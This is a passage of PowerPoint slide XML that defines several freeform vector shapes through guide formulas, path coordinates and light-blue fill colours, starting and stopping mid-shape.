                  <a:gd name="T10" fmla="*/ 0 w 10"/>
                  <a:gd name="T11" fmla="*/ 21 h 46"/>
                  <a:gd name="T12" fmla="*/ 0 w 10"/>
                  <a:gd name="T13" fmla="*/ 28 h 46"/>
                  <a:gd name="T14" fmla="*/ 2 w 10"/>
                  <a:gd name="T15" fmla="*/ 36 h 46"/>
                  <a:gd name="T16" fmla="*/ 3 w 10"/>
                  <a:gd name="T17" fmla="*/ 46 h 46"/>
                  <a:gd name="T18" fmla="*/ 10 w 10"/>
                  <a:gd name="T19" fmla="*/ 46 h 46"/>
                  <a:gd name="T20" fmla="*/ 10 w 10"/>
                  <a:gd name="T21" fmla="*/ 43 h 46"/>
                  <a:gd name="T22" fmla="*/ 9 w 10"/>
                  <a:gd name="T23" fmla="*/ 40 h 46"/>
                  <a:gd name="T24" fmla="*/ 7 w 10"/>
                  <a:gd name="T25" fmla="*/ 35 h 46"/>
                  <a:gd name="T26" fmla="*/ 7 w 10"/>
                  <a:gd name="T27" fmla="*/ 28 h 46"/>
                  <a:gd name="T28" fmla="*/ 6 w 10"/>
                  <a:gd name="T29" fmla="*/ 21 h 46"/>
                  <a:gd name="T30" fmla="*/ 7 w 10"/>
                  <a:gd name="T31" fmla="*/ 14 h 46"/>
                  <a:gd name="T32" fmla="*/ 7 w 10"/>
                  <a:gd name="T33" fmla="*/ 7 h 46"/>
                  <a:gd name="T34" fmla="*/ 10 w 10"/>
                  <a:gd name="T35" fmla="*/ 1 h 46"/>
                  <a:gd name="T36" fmla="*/ 10 w 10"/>
                  <a:gd name="T37" fmla="*/ 1 h 46"/>
                  <a:gd name="T38" fmla="*/ 10 w 10"/>
                  <a:gd name="T39" fmla="*/ 1 h 46"/>
                  <a:gd name="T40" fmla="*/ 10 w 10"/>
                  <a:gd name="T41" fmla="*/ 0 h 46"/>
                  <a:gd name="T42" fmla="*/ 10 w 10"/>
                  <a:gd name="T43" fmla="*/ 0 h 46"/>
                  <a:gd name="T44" fmla="*/ 9 w 10"/>
                  <a:gd name="T45" fmla="*/ 0 h 46"/>
                  <a:gd name="T46" fmla="*/ 7 w 10"/>
                  <a:gd name="T47" fmla="*/ 0 h 46"/>
                  <a:gd name="T48" fmla="*/ 6 w 10"/>
                  <a:gd name="T49" fmla="*/ 1 h 46"/>
                  <a:gd name="T50" fmla="*/ 4 w 10"/>
                  <a:gd name="T51" fmla="*/ 1 h 4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
                  <a:gd name="T79" fmla="*/ 0 h 46"/>
                  <a:gd name="T80" fmla="*/ 10 w 10"/>
                  <a:gd name="T81" fmla="*/ 46 h 4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 h="46">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10636" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1272" y="2839"/>
                <a:ext cx="7" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 7"/>
                  <a:gd name="T1" fmla="*/ 1 h 33"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 1 h 33"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 3 h 33"/>
                  <a:gd name="T6" fmla="*/ 0 w 7"/>
                  <a:gd name="T7" fmla="*/ 6 h 33"/>
                  <a:gd name="T8" fmla="*/ 0 w 7"/>
                  <a:gd name="T9" fmla="*/ 10 h 33"/>
                  <a:gd name="T10" fmla="*/ 0 w 7"/>
                  <a:gd name="T11" fmla="*/ 15 h 33"/>
                  <a:gd name="T12" fmla="*/ 0 w 7"/>
                  <a:gd name="T13" fmla="*/ 20 h 33"/>
                  <a:gd name="T14" fmla="*/ 0 w 7"/>
                  <a:gd name="T15" fmla="*/ 27 h 33"/>
                  <a:gd name="T16" fmla="*/ 1 w 7"/>
                  <a:gd name="T17" fmla="*/ 33 h 33"/>
                  <a:gd name="T18" fmla="*/ 5 w 7"/>
                  <a:gd name="T19" fmla="*/ 33 h 33"/>
                  <a:gd name="T20" fmla="*/ 5 w 7"/>
                  <a:gd name="T21" fmla="*/ 31 h 33"/>
                  <a:gd name="T22" fmla="*/ 5 w 7"/>
                  <a:gd name="T23" fmla="*/ 29 h 33"/>
                  <a:gd name="T24" fmla="*/ 4 w 7"/>
                  <a:gd name="T25" fmla="*/ 26 h 33"/>
                  <a:gd name="T26" fmla="*/ 4 w 7"/>
                  <a:gd name="T27" fmla="*/ 20 h 33"/>
                  <a:gd name="T28" fmla="*/ 4 w 7"/>
                  <a:gd name="T29" fmla="*/ 15 h 33"/>
                  <a:gd name="T30" fmla="*/ 4 w 7"/>
                  <a:gd name="T31" fmla="*/ 9 h 33"/>
                  <a:gd name="T32" fmla="*/ 4 w 7"/>
                  <a:gd name="T33" fmla="*/ 5 h 33"/>
                  <a:gd name="T34" fmla="*/ 7 w 7"/>
                  <a:gd name="T35" fmla="*/ 0 h 33"/>
                  <a:gd name="T36" fmla="*/ 7 w 7"/>
                  <a:gd name="T37" fmla="*/ 0 h 33"/>
                  <a:gd name="T38" fmla="*/ 7 w 7"/>
                  <a:gd name="T39" fmla="*/ 0 h 33"/>
                  <a:gd name="T40" fmla="*/ 5 w 7"/>
                  <a:gd name="T41" fmla="*/ 0 h 33"/>
                  <a:gd name="T42" fmla="*/ 5 w 7"/>
                  <a:gd name="T43" fmla="*/ 0 h 33"/>
                  <a:gd name="T44" fmla="*/ 5 w 7"/>
                  <a:gd name="T45" fmla="*/ 0 h 33"/>
                  <a:gd name="T46" fmla="*/ 4 w 7"/>
                  <a:gd name="T47" fmla="*/ 0 h 33"/>
                  <a:gd name="T48" fmla="*/ 3 w 7"/>
                  <a:gd name="T49" fmla="*/ 0 h 33"/>
                  <a:gd name="T50" fmla="*/ 2 w 7"/>
                  <a:gd name="T51" fmla="*/ 1 h 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33"/>
                  <a:gd name="T80" fmla="*/ 7 w 7"/>
                  <a:gd name="T81" fmla="*/ 33 h 3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33">
                    <a:moveTo>
                      <a:pt x="2" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10637" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1367" y="2806"/>
                <a:ext cx="24" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 1 h 90"/>
                  <a:gd name="T2" fmla="*/ 22 w 24"/>
                  <a:gd name="T3" fmla="*/ 1 h 90"/>
                  <a:gd name="T4" fmla="*/ 21 w 24"/>
                  <a:gd name="T5" fmla="*/ 4 h 90"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 8 h 90"/>
                  <a:gd name="T8" fmla="*/ 17 w 24"/>
                  <a:gd name="T9" fmla="*/ 17 h 90"/>
                  <a:gd name="T10" fmla="*/ 15 w 24"/>
                  <a:gd name="T11" fmla="*/ 28 h 90"/>
                  <a:gd name="T12" fmla="*/ 14 w 24"/>
                  <a:gd name="T13" fmla="*/ 43 h 90"/>
                  <a:gd name="T14" fmla="*/ 15 w 24"/>
                  <a:gd name="T15" fmla="*/ 64 h 90"/>
                  <a:gd name="T16" fmla="*/ 18 w 24"/>
                  <a:gd name="T17" fmla="*/ 90 h 90"/>
                  <a:gd name="T18" fmla="*/ 5 w 24"/>
                  <a:gd name="T19" fmla="*/ 90 h 90"/>
                  <a:gd name="T20" fmla="*/ 4 w 24"/>
                  <a:gd name="T21" fmla="*/ 88 h 90"/>
                  <a:gd name="T22" fmla="*/ 3 w 24"/>
                  <a:gd name="T23" fmla="*/ 81 h 90"/>
                  <a:gd name="T24" fmla="*/ 1 w 24"/>
                  <a:gd name="T25" fmla="*/ 69 h 90"/>
                  <a:gd name="T26" fmla="*/ 0 w 24"/>
                  <a:gd name="T27" fmla="*/ 56 h 90"/>
                  <a:gd name="T28" fmla="*/ 0 w 24"/>
                  <a:gd name="T29" fmla="*/ 41 h 90"/>
                  <a:gd name="T30" fmla="*/ 1 w 24"/>
                  <a:gd name="T31" fmla="*/ 27 h 90"/>
                  <a:gd name="T32" fmla="*/ 4 w 24"/>
                  <a:gd name="T33" fmla="*/ 13 h 90"/>
                  <a:gd name="T34" fmla="*/ 7 w 24"/>
                  <a:gd name="T35" fmla="*/ 0 h 90"/>
                  <a:gd name="T36" fmla="*/ 24 w 24"/>
                  <a:gd name="T37" fmla="*/ 1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90"/>
                  <a:gd name="T59" fmla="*/ 24 w 24"/>
                  <a:gd name="T60" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="24" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10638" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1368" y="2813"/>
                <a:ext cx="19" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 76"/>
                  <a:gd name="T2" fmla="*/ 19 w 19"/>
                  <a:gd name="T3" fmla="*/ 0 h 76"/>
                  <a:gd name="T4" fmla="*/ 18 w 19"/>
                  <a:gd name="T5" fmla="*/ 3 h 76"/>
                  <a:gd name="T6" fmla="*/ 17 w 19"/>
                  <a:gd name="T7" fmla="*/ 7 h 76"/>
                  <a:gd name="T8" fmla="*/ 14 w 19"/>
                  <a:gd name="T9" fmla="*/ 13 h 76"/>
                  <a:gd name="T10" fmla="*/ 13 w 19"/>
                  <a:gd name="T11" fmla="*/ 22 h 76"/>
                  <a:gd name="T12" fmla="*/ 12 w 19"/>
                  <a:gd name="T13" fmla="*/ 36 h 76"/>
                  <a:gd name="T14" fmla="*/ 13 w 19"/>
                  <a:gd name="T15" fmla="*/ 54 h 76"/>
                  <a:gd name="T16" fmla="*/ 14 w 19"/>
                  <a:gd name="T17" fmla="*/ 76 h 76"/>
                  <a:gd name="T18" fmla="*/ 4 w 19"/>
                  <a:gd name="T19" fmla="*/ 76 h 76"/>
                  <a:gd name="T20" fmla="*/ 4 w 19"/>
                  <a:gd name="T21" fmla="*/ 74 h 76"/>
                  <a:gd name="T22" fmla="*/ 3 w 19"/>
                  <a:gd name="T23" fmla="*/ 68 h 76"/>
                  <a:gd name="T24" fmla="*/ 2 w 19"/>
                  <a:gd name="T25" fmla="*/ 59 h 76"/>
                  <a:gd name="T26" fmla="*/ 0 w 19"/>
                  <a:gd name="T27" fmla="*/ 47 h 76"/>
                  <a:gd name="T28" fmla="*/ 0 w 19"/>
                  <a:gd name="T29" fmla="*/ 35 h 76"/>
                  <a:gd name="T30" fmla="*/ 0 w 19"/>
                  <a:gd name="T31" fmla="*/ 22 h 76"/>
                  <a:gd name="T32" fmla="*/ 3 w 19"/>
                  <a:gd name="T33" fmla="*/ 10 h 76"/>
                  <a:gd name="T34" fmla="*/ 6 w 19"/>
                  <a:gd name="T35" fmla="*/ 0 h 76"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 0 h 7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76"/>
                  <a:gd name="T59" fmla="*/ 19 w 19"/>
                  <a:gd name="T60" fmla="*/ 76 h 7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76">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10639" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1370" y="2819"/>
                <a:ext cx="15" cy="63"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 63"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 1 h 63"/>
                  <a:gd name="T4" fmla="*/ 14 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 63"/>
                  <a:gd name="T6" fmla="*/ 12 w 15"/>
                  <a:gd name="T7" fmla="*/ 6 h 63"/>
                  <a:gd name="T8" fmla="*/ 11 w 15"/>
                  <a:gd name="T9" fmla="*/ 12 h 63"/>
                  <a:gd name="T10" fmla="*/ 10 w 15"/>
                  <a:gd name="T11" fmla="*/ 19 h 63"/>
                  <a:gd name="T12" fmla="*/ 9 w 15"/>
                  <a:gd name="T13" fmla="*/ 30 h 63"/>
                  <a:gd name="T14" fmla="*/ 10 w 15"/>
                  <a:gd name="T15" fmla="*/ 44 h 63"/>
                  <a:gd name="T16" fmla="*/ 11 w 15"/>
                  <a:gd name="T17" fmla="*/ 63 h 63"/>
                  <a:gd name="T18" fmla="*/ 2 w 15"/>
                  <a:gd name="T19" fmla="*/ 63 h 63"/>
                  <a:gd name="T20" fmla="*/ 2 w 15"/>
                  <a:gd name="T21" fmla="*/ 62 h 63"/>
                  <a:gd name="T22" fmla="*/ 1 w 15"/>
                  <a:gd name="T23" fmla="*/ 56 h 63"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>
                  <a:gd name="T25" fmla="*/ 49 h 63"/>
                  <a:gd name="T26" fmla="*/ 0 w 15"/>
                  <a:gd name="T27" fmla="*/ 40 h 63"/>
                  <a:gd name="T28" fmla="*/ 0 w 15"/>
                  <a:gd name="T29" fmla="*/ 29 h 63"/>
                  <a:gd name="T30" fmla="*/ 0 w 15"/>
                  <a:gd name="T31" fmla="*/ 19 h 63"/>
                  <a:gd name="T32" fmla="*/ 1 w 15"/>
                  <a:gd name="T33" fmla="*/ 8 h 63"/>
                  <a:gd name="T34" fmla="*/ 4 w 15"/>
                  <a:gd name="T35" fmla="*/ 0 h 63"/>
                  <a:gd name="T36" fmla="*/ 15 w 15"/>
                  <a:gd name="T37" fmla="*/ 0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63"/>
                  <a:gd name="T59" fmla="*/ 15 w 15"/>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63">
                    <a:moveTo>
                      <a:pt x="15" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10640" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1370" y="2825"/>
                <a:ext cx="12" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 12"/>
                  <a:gd name="T1" fmla="*/ 1 h 50"/>
                  <a:gd name="T2" fmla="*/ 12 w 12"/>
                  <a:gd name="T3" fmla="*/ 1 h 50"/>
                  <a:gd name="T4" fmla="*/ 11 w 12"/>
                  <a:gd name="T5" fmla="*/ 2 h 50"/>
                  <a:gd name="T6" fmla="*/ 10 w 12"/>
                  <a:gd name="T7" fmla="*/ 5 h 50"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 9 h 50"/>
                  <a:gd name="T10" fmla="*/ 9 w 12"/>
                  <a:gd name="T11" fmla="*/ 15 h 50"/>
                  <a:gd name="T12" fmla="*/ 8 w 12"/>
                  <a:gd name="T13" fmla="*/ 24 h 50"/>
                  <a:gd name="T14" fmla="*/ 8 w 12"/>
                  <a:gd name="T15" fmla="*/ 36 h 50"/>
                  <a:gd name="T16" fmla="*/ 9 w 12"/>
                  <a:gd name="T17" fmla="*/ 50 h 50"/>
                  <a:gd name="T18" fmla="*/ 2 w 12"/>
                  <a:gd name="T19" fmla="*/ 50 h 50"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 49 h 50"/>
                  <a:gd name="T22" fmla="*/ 2 w 12"/>
                  <a:gd name="T23" fmla="*/ 45 h 50"/>
                  <a:gd name="T24" fmla="*/ 1 w 12"/>
                  <a:gd name="T25" fmla="*/ 38 h 50"/>
                  <a:gd name="T26" fmla="*/ 1 w 12"/>
                  <a:gd name="T27" fmla="*/ 31 h 50"/>
                  <a:gd name="T28" fmla="*/ 0 w 12"/>
                  <a:gd name="T29" fmla="*/ 23 h 50"/>
                  <a:gd name="T30" fmla="*/ 1 w 12"/>
                  <a:gd name="T31" fmla="*/ 15 h 50"/>
                  <a:gd name="T32" fmla="*/ 2 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 50"/>
                  <a:gd name="T34" fmla="*/ 4 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 50"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 1 h 5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50"/>
                  <a:gd name="T59" fmla="*/ 12 w 12"/>
                  <a:gd name="T60" fmla="*/ 50 h 5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50">
                    <a:moveTo>
                      <a:pt x="12" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10641" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1371" y="2832"/>
                <a:ext cx="9" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
